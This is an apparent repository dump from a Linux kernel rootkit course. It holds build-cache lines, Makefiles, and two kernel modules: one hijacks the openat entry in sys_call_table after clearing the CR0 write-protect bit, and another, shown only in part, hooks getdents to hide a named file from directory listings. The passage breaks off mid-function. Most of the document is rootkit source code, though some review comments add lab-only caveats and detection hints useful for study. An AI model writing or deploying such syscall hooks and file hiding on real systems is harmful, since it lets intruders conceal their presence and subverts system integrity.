__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_strict-prototypes";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=strict-prototypes 66 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_date-time";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=date-time 67 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_incompatible-pointer-types";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=incompatible-pointer-types 68 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Werror_designated-init";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Werror=designated-init 69 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-fcf-protection_none_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fcf-protection_none";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 70 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if____gcc_-Werror__-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-fmacro-prefix-map_./__-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-fmacro-prefix-map_./_";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 71 | __cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___ar_rcD_"_TMP"__>/dev/null_2>&1;_then_echo_"D";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := D 72 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc_-Werror_-D__KERNEL___-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-Wpacked-not-aligned_-c_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"-Wno-packed-not-aligned";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := 73 | 
__cached_set_-e;_TMP_"/home/krash/works/rootkitdev/module06/.__.tmp";_TMPO_"/home/krash/works/rootkitdev/module06/.__.o";_if___gcc__-Wl_--build-id_-D__KERNEL_____-Wall_-Wundef_-Wstrict-prototypes_-Wno-trigraphs_-fno-strict-aliasing_-fno-common_-fshort-wchar_-Werror-implicit-function-declaration_-Wno-format-security_-std_gnu89_-fno-PIE_-mno-sse_-mno-mmx_-mno-sse2_-mno-3dnow_-mno-avx_-m64_-falign-jumps_1_-falign-loops_1_-mno-80387_-mno-fp-ret-in-387_-mpreferred-stack-boundary_3_-mskip-rax-setup_-mtune_generic_-mno-red-zone_-mcmodel_kernel_-funit-at-a-time_-DCONFIG_X86_X32_ABI_-DCONFIG_AS_CFI_1_-DCONFIG_AS_CFI_SIGNAL_FRAME_1_-DCONFIG_AS_CFI_SECTIONS_1_-DCONFIG_AS_FXSAVEQ_1_-DCONFIG_AS_SSSE3_1_-DCONFIG_AS_CRC32_1_-DCONFIG_AS_AVX_1_-DCONFIG_AS_AVX2_1_-DCONFIG_AS_AVX512_1_-DCONFIG_AS_SHA1_NI_1_-DCONFIG_AS_SHA256_NI_1_-pipe_-Wno-sign-compare_-fno-asynchronous-unwind-tables_-mindirect-branch_thunk-extern_-mindirect-branch-register_-fno-jump-tables_-fno-delete-null-pointer-checks_-Wno-frame-address_-Wno-format-truncation_-Wno-format-overflow_-Wno-int-in-bool-context_-O2_--param_allow-store-data-races_0_-DCC_HAVE_ASM_GOTO_-Wframe-larger-than_1024_-fstack-protector-strong_-Wno-unused-but-set-variable_-Wno-unused-const-variable_-fno-omit-frame-pointer_-fno-optimize-sibling-calls_-fno-var-tracking-assignments_-pg_-mfentry_-DCC_USING_FENTRY_-Wdeclaration-after-statement_-Wno-pointer-sign_-fno-strict-overflow_-fno-merge-all-constants_-fmerge-constants_-fno-stack-check_-fconserve-stack_-Werror_implicit-int_-Werror_strict-prototypes_-Werror_date-time_-Werror_incompatible-pointer-types_-Werror_designated-init_-nostdlib_-x_c_/dev/null_-o_"_TMP"__>/dev/null_2>&1;_then_echo_"_-Wl_--build-id";_else_echo_"";_fi;_rm_-f_"_TMP"_"_TMPO" := -Wl,--build-id 74 | -------------------------------------------------------------------------------- /module06_hooking_sysopen/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See 
https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module06_hooking_sysopen/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module06_hooking_sysopen/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | 12 | MODULE_LICENSE("GPL"); 13 | MODULE_AUTHOR("SourceCodeDeleted"); 14 | MODULE_DESCRIPTION("Simple Hooking Of a Syscall"); 15 | MODULE_VERSION("1.0"); 16 | 17 | 18 | unsigned long **SYS_CALL_TABLE; 19 | 20 | 21 | 22 | void EnablePageWriting(void){ 23 | write_cr0(read_cr0() & (~0x10000)); 24 | 25 | } 26 | void DisablePageWriting(void){ 27 | write_cr0(read_cr0() | 0x10000); 28 | 29 | } 30 | 31 | // bool StartsWith(const char *a, const char *b) 32 | // { 33 | // if(strncmp(a, b, strlen(b)) == 0) return 1; 34 | // return 0; 35 | // } 36 | 37 | 38 | //define our origional function. 39 | asmlinkage int ( *original_open ) (int dirfd, const char *pathname, int flags); 40 | 41 | 42 | 43 | 44 | 45 | //Create Our version of Open Function. 
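/*
 * Replacement for the openat slot in sys_call_table.
 *
 * Copies the caller's pathname into a kernel buffer, logs when it is exactly
 * "breakpoints", then forwards the call unchanged to the saved handler.
 *
 * pathname is a user-space pointer of attacker-chosen length, so the copy is
 * bounded by the size of directory[] and stops on the first fault or NUL.
 * The previous loop read `letter` before it was ever assigned and had no
 * upper bound on `i`, which let any process overrun the kernel stack simply
 * by opening a long path.
 *
 * NOTE(review): openat(2) also takes a mode argument; this three-argument
 * prototype does not forward it explicitly. Confirm that O_CREAT callers
 * still get the mode they passed.
 *
 * Returns whatever the original handler returns.
 */
asmlinkage int HookOpen(int dirfd, const char *pathname, int flags)
{
    char directory[255];
    char OurFile[14] = "breakpoints";
    char letter = 0;
    int i;

    /* get_user() copies one simple value from user space; non-zero means fault. */
    for (i = 0; i < (int)sizeof(directory) - 1; i++) {
        if (get_user(letter, pathname + i) != 0 || letter == '\0')
            break;
        directory[i] = letter;
    }
    directory[i] = '\0';    /* always terminated, even on truncation or fault */

    if (strcmp(OurFile, directory) == 0) {
        printk(KERN_INFO "File Accessed!!! %s", directory);
    }
    memset(directory, 0, sizeof(directory));

    /* Hand over to the original openat handler. */
    return (*original_open)(dirfd, pathname, flags);
}

/*
 * Module init: resolve sys_call_table and point the openat slot at HookOpen,
 * keeping the previous entry in original_open.
 *
 * Returns 0 on success, -ENOENT when the table symbol cannot be resolved
 * (the table was previously dereferenced without a check).
 *
 * NOTE(review): this relies on kallsyms_lookup_name() being callable from a
 * module and on write_cr0() accepting a cleared WP bit (0x10000, see
 * EnablePageWriting). Current mainline kernels no longer export the former
 * and pin CR0.WP, so treat this as lab-kernel-only code. For defenders, a
 * sys_call_table entry that points outside the kernel's own text is exactly
 * what syscall-table integrity checks look for.
 */
static int __init SetHooks(void)
{
    SYS_CALL_TABLE = (unsigned long **)kallsyms_lookup_name("sys_call_table");

    printk(KERN_INFO "Hooks Will Be Set.\n");
    printk(KERN_INFO "System call table at %p\n", SYS_CALL_TABLE);

    if (!SYS_CALL_TABLE)
        return -ENOENT;

    /* Clear CR0.WP so the read-only table page can be written. */
    EnablePageWriting();

    /* Save the current openat entry, then install the hook. */
    original_open = (void *)SYS_CALL_TABLE[__NR_openat];
    SYS_CALL_TABLE[__NR_openat] = (unsigned long *)HookOpen;
    DisablePageWriting();

    return 0;
}

/*
 * Module exit: put the saved openat entry back into sys_call_table.
 */
static void __exit HookCleanup(void)
{
    EnablePageWriting();
    SYS_CALL_TABLE[__NR_openat] = (unsigned long *)original_open;
    DisablePageWriting();

    printk(KERN_INFO "HooksCleaned Up!");
}

module_init(SetHooks);
module_exit(HookCleanup);


//STRACE
/*
root@anonHost:~# strace cat somefile
execve("/bin/cat", ["cat", "somefile"], 0x7ffd43175fe8 ) = 0
brk(NULL) = 0x5614699df000
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/etc/ld.so.cache", O_RDONLY|O_CLOEXEC) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=169782, ...}) = 0
mmap(NULL, 169782, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f459a155000
close(3) = 0
access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 3
read(3, "\177ELF\2\1\1\3\0\0\0\0\0\0\0\0\3\0>\0\1\0\0\0\260\34\2\0\0\0\0\0"..., 832) = 832
fstat(3, {st_mode=S_IFREG|0755, st_size=2030544, ...}) = 0
mmap(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f459a153000
mmap(NULL, 4131552, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 3, 0) = 0x7f4599b67000
mprotect(0x7f4599d4e000, 2097152, PROT_NONE) = 0
mmap(0x7f4599f4e000, 24576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0x1e7000) = 0x7f4599f4e000
mmap(0x7f4599f54000, 15072, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x7f4599f54000
close(3) = 0
arch_prctl(ARCH_SET_FS, 0x7f459a154540) = 0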
mprotect(0x7f4599f4e000, 16384, PROT_READ) = 0 139 | mprotect(0x56146832f000, 4096, PROT_READ) = 0 140 | mprotect(0x7f459a17f000, 4096, PROT_READ) = 0 141 | munmap(0x7f459a155000, 169782) = 0 142 | brk(NULL) = 0x5614699df000 143 | brk(0x561469a00000) = 0x561469a00000 144 | openat(AT_FDCWD, "/usr/lib/locale/locale-archive", O_RDONLY|O_CLOEXEC) = 3 145 | fstat(3, {st_mode=S_IFREG|0644, st_size=4547104, ...}) = 0 146 | mmap(NULL, 4547104, PROT_READ, MAP_PRIVATE, 3, 0) = 0x7f4599710000 147 | close(3) = 0 148 | fstat(1, {st_mode=S_IFCHR|0620, st_rdev=makedev(136, 1), ...}) = 0 149 | openat(AT_FDCWD, "somefile", O_RDONLY) = 3 150 | fstat(3, {st_mode=S_IFREG|0644, st_size=46, ...}) = 0 151 | fadvise64(3, 0, 0, POSIX_FADV_SEQUENTIAL) = 0 152 | mmap(NULL, 139264, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x7f459a15d000 153 | read(3, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 131072) = 46 154 | write(1, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"..., 46aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 155 | ) = 46 156 | read(3, "", 131072) = 0 157 | munmap(0x7f459a15d000, 139264) = 0 158 | close(3) = 0 159 | close(1) = 0 160 | close(2) = 0 161 | exit_group(0) = ? 
162 | +++ exited with 0 +++ 163 | 164 | */ -------------------------------------------------------------------------------- /module06_hooking_sysopen/main.o.ur-safe: -------------------------------------------------------------------------------- 1 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-119 2 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-129 3 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-149 4 | /home/krash/works/rootkitdev-linux/module06/main.o-.text-159 5 | -------------------------------------------------------------------------------- /module06_hooking_sysopen/testfile: -------------------------------------------------------------------------------- 1 | foooooooooooo 2 | -------------------------------------------------------------------------------- /module07_hooking_getdents/.vscode/tasks.json: -------------------------------------------------------------------------------- 1 | { 2 | // See https://go.microsoft.com/fwlink/?LinkId=733558 3 | // for the documentation about the tasks.json format 4 | "version": "2.0.0", 5 | "tasks": [ 6 | { 7 | "label": "echo", 8 | "type": "shell", 9 | "command": "make", 10 | "group": { 11 | "kind": "build", 12 | "isDefault": true 13 | } 14 | } 15 | ] 16 | } -------------------------------------------------------------------------------- /module07_hooking_getdents/Makefile: -------------------------------------------------------------------------------- 1 | ccflags-y = -std=gnu99 2 | obj-m += kittyrootkit.o 3 | kittyrootkit-objs := main.o 4 | 5 | 6 | 7 | 8 | all: 9 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 10 | 11 | clean: 12 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 13 | 14 | -------------------------------------------------------------------------------- /module07_hooking_getdents/main.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | 
#include 7 | #include 8 | #include 9 | #include 10 | #include 11 | 12 | 13 | 14 | MODULE_LICENSE("GPL"); 15 | MODULE_AUTHOR("SourceCodeDeleted"); 16 | MODULE_DESCRIPTION("Hide File Module"); 17 | MODULE_VERSION("1.0"); 18 | 19 | 20 | unsigned long **SYS_CALL_TABLE; 21 | 22 | 23 | 24 | void EnablePageWriting(void){ 25 | write_cr0(read_cr0() & (~0x10000)); 26 | 27 | } 28 | void DisablePageWriting(void){ 29 | write_cr0(read_cr0() | 0x10000); 30 | 31 | } 32 | 33 | 34 | 35 | //define our origional function. 36 | // Credit this author. 37 | // https://zuliu.me/2018/03/22/rootkit/ 38 | // My code was similar but had a few problems. Zuliu had a few better in his code. 39 | /* 40 | int getdents(unsigned int fd, struct linux_dirent *dirp, unsigned int count); 41 | int getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count); 42 | */ 43 | 44 | 45 | struct linux_dirent { 46 | unsigned long d_ino; /* Inode number */ 47 | unsigned long d_off; /* Offset to next linux_dirent */ 48 | unsigned short d_reclen; // d_reclen is the way to tell the length of this entry 49 | char d_name[]; // the struct value is actually longer than this, and d_name is variable width. 50 | }*dirp2 , *dirp3 , *retn; // // dirp = directory pointer 51 | 52 | 53 | 54 | 55 | char hide[]="secretfile.txt"; 56 | 57 | 58 | asmlinkage int ( *original_getdents ) (unsigned int fd, struct linux_dirent *dirp, unsigned int count); 59 | 60 | //Create Our version of Open Function. 
/*
 * Replacement for the getdents slot in sys_call_table.
 *
 * Calls the saved handler first, copies the directory records it produced
 * from the caller's buffer into kernel memory, walks them by d_reclen, drops
 * the record whose d_name equals `hide`, and copies the result back.
 *
 * Records is used throughout as a byte count (it sizes the allocation and
 * both copies). Returns that count, reduced by the length of a removed
 * record, or the original handler's value unchanged when it is <= 0.
 *
 * NOTE(review): the kmalloc() result is used without a NULL check and the
 * return values of copy_from_user()/copy_to_user() are ignored, so a failed
 * allocation or a short copy becomes a kernel fault rather than an error to
 * the caller.
 *
 * NOTE(review): every entry name of every listing is written to the kernel
 * log by the printk below. For defenders, entries removed this way still
 * resolve by direct lookup, so comparing a directory listing against another
 * view of the same directory exposes the tampering.
 */
asmlinkage int HookGetDents(unsigned int fd, struct linux_dirent *dirp, unsigned int count){

    struct linux_dirent *retn, *dirp3;
    int Records, RemainingBytes, length;

    /* Let the real handler fill the user buffer. */
    Records = (*original_getdents) (fd, dirp, count);

